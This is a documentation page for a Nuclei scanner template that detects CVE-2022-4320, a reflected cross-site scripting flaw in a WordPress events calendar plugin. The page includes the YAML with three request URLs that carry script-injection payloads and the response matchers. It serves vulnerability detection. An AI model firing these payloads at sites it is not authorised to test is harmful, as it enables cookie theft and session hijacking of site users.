WordPress Events Calendar <1.4.5 - Cross-Site Scripting
ID: CVE-2022-4320
Severity: medium
Author: r3Y3r53
Tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware
Description
Section titled “Description”WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.
YAML Source
Section titled “YAML Source”id: CVE-2022-4320
info: name: WordPress Events Calendar <1.4.5 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c - https://nvd.nist.gov/vuln/detail/CVE-2022-4320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 epss-score: 0.00092 epss-percentile: 0.3872 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: mhsoftware product: wordpress_events_calendar_plugin framework: wordpress tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware
http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(document.cookie)</script>' - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>' - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>'
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - 'imgNavLeftXX\"><script>alert(document.cookie)</script>' - '<script>alert(document.cookie)</script>({});' - '><script>alert(document.cookie)</script>.js' condition: or
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 480a00453043022062c057a6cc51e4edbae3dc0df2ae31116900e5e57b8447431f209eb5c985a425021f3b90670543f2b2c89bd77914ad8144267087aee6db461b5a06b4cdd90c47d2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4320.yaml"